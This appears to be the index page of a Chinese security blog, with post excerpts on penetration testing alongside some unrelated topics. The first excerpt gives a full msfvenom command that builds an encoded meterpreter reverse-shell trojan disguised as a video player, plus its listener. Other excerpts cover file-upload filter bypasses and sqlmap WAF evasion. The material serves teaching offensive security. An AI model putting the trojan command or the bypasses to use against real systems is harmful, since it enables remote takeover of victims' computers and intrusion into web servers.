Dec212021
渗透测试之后门软件
1. 制作Windows恶意软件
1.1 使用msfvenom生成后门木马
制作后门程序
sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.142.135 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜影音.exe
、
msf启动handler监听后门程序,
use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.14...阅读全文
作者:绝缘体.. | 分类:amd, apache, html, Linux, windows, 开发工具, 操作系统, 科技企业, 编程语言 | 阅读: | 标签:amd, Apache, html, Linux, windows
抢沙发
Dec052021
http 静态 web 服务器下载
http 静态 web 服务器
基于 go 语言开发,下载后只有一个文件,绿色安装,一键启动!可以根据自己的需要进行配置,支持同一台机器多端口开启服务。
windows 版 提取码:tp7s
linux 版 提取码:h842
使用说明
1. 下载文件后执行该文件 ( windows 双击该文件,linux输入该文件名称敲击enter键 ),即可在本地开启一个 web 服务器并同时开启了一个浏览器打开服务器地址。
2. 在与该服务器文...阅读全文
Dec022021
23:WEB漏洞-文件上传之解析漏洞编辑器安全
本课重点
几种常见中间件解析漏洞简要演示
案例1:中间件解析漏洞思维导图
几种常见Web编辑器简要演示
案例2:fckeditor2.6.3 文件上传漏洞
几种常见CMS文件上传简要演示
案例3:通达OA文件上传+文件包含漏洞
贴近实际应用下的以上知识点演示
案例4:贴近实际应用下以上知识点总结
案例1:中间件解析漏洞思维导图
演示案例见上篇博客
案例2:fckeditor2.6.3 文件上传漏洞
...阅读全文
Dec022021
22:WEB漏洞-文件上传之内容逻辑数组绕过与解析漏洞
知识点
文件头检测
图像文件信息判断
逻辑安全-二次渲染
逻辑安全-条件竞争
目录命名-x.php/.
脚本函数漏洞-CVE-2015-2348
数组接受+目录命名
本课重点:
Uploadlabs-pass13-20关卡测试
案例1:Pass-13 文件头检测 图片马绕过
案例2:Pass-14 getimagesize()图像文件信息判断 图片马绕过
案例3:Pass-15 exif_imagetype()图像文件信息判断 图片马绕过
案例4:Pass-16 二次渲染绕过
案...阅读全文
Dec022021
21:WEB漏洞-文件上传之后端黑白名单绕过
知识点
文件上传常见验证:后缀名,类型,文件头等
1.后缀名:黑名单,白名单
黑名单:明确不让上传的格式后缀,比如asp,php,jsp,aspx,cgi,war等,但是黑名单易被绕过,比如上传php5,Phtml等
白名单:明确可以上传的格式后缀,比如jpg,png,zip,rar,gif等,推荐白名单。
2.文件类型:MIME信息
content-type字段校验,可以通过抓包改包方式绕过
3.文件头:内容头信息
每种类型的文件都...阅读全文
Nov082021
文件上传
文件上传
1. 文件类型检测绕过
1.1. 更改请求绕过
有的站点仅仅在前端检测了文件类型,这种类型的检测可以直接修改网络请求绕过。 同样的,有的站点在后端仅检查了HTTP Header中的信息,比如 Content-Type 等,这种检查同样可以通过修改网络请求绕过。
1.2. Magic检测绕过
有的站点使用文件头来检测文件类型,这种检查可以在Shell前加入对应的字节以绕过检查。几种常见的文件类型的头字节...阅读全文
Nov052021
使用Unity构建跨平台的游戏应用
Unity是一款非常强大的游戏开发引擎,它可以帮助开发者轻松地构建跨平台的游戏应用程序。在本文中,我将介绍Unity的一些主要功能和优势,并提供一些使用Unity构建跨平台游戏应用的实用建议。
Unity简介
Unity是由Unity Technologies开发的一款跨平台的游戏开发引擎。它支持多种平台,包括Windows、 macOS、Android、iOS等,使得开发者能够快速构建适用于不同操作系统的游戏应用。Unity拥...阅读全文
Oct262021
MySQL日志设置及查看
MySQL有以下几种日志:错误日志: -log-err查询日志: -log慢查询日志: -log-slow-queries更新日志: -log-update二进制日志: -log-bin默认情况下,所有日志创建于mysqld数据目录中。通过刷新日志,你可以强制 mysqld来关闭和重新打开日志文件(或者在某些情况下切换到一个新的日志)。当你执行一个FLUSH LOGS语句或执行mysqladmin flush-logs或mysqladmin refresh时,出现日志刷新
1. 错...阅读全文
Oct252021
sqlmap之绕过waf思路
1.设置请求头
--random-agent
--user-agent="User-Agent':'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
--user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
2.设置代理
--proxy=http://127.0.0.1:8080
3.设置延迟
--delay=1
4.利用–tamper参数中的编码脚本
常见编码搭配方式普通tamper搭配方式:
tam...阅读全文
Oct192021
75:应急响应-数据库&漏洞口令检索&应急取证箱
必须知识点:
1.第三方应用由于是选择性安装,如何做好信息收集和漏洞探针也是获取攻击者思路的重要操作,除去本身漏洞外,提前预知或口令相关攻击也要进行筛选。
2.排除三方应用攻击行为,自查漏洞分析攻击者思路,人工配合工具脚本
3.由于工具或脚本更新迭代快,分类复杂,打造自己的工具箱迫在眉睫
本课重点:
案例1:系统日志-Win 日志自动神器 LogonTracer-外网内网日志
案例2:应...阅读全文